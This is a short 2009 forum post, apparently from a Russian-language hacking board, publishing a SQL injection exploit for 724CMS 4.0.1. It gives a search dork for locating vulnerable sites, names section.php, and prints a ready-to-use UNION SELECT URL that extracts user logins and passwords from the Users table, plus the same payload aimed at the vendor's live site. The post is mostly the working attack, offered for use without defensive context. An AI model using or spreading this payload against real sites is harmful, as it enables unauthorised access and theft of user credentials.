724CMS 4.0.1 SQL-Inj

Discussion in 'Веб-уязвимости' started by Ded MustD!e, 8 Sep 2009.

  1. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Продукт: 724CMS
    Версия: 4.0.1
    Дорк: inurl:"section.php?Nav=Section"
    Уязвимый скрипт: section.php

    CMS платная, где слить сорцы не нашел.

    Эксплойт:
    Code:
    http://site.com/section.php?Nav=Section&Lang=En&ID=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_login,user_password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+Users--
    Пример на сайте разработчика:
    Code:
    http://724cms.ca/section.php?Nav=Section&Lang=En&ID=-18+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_login,user_password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+Users--
    Вывод в тегах <title></title>
     
    #1 Ded MustD!e, 8 Sep 2009
    6 people like this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.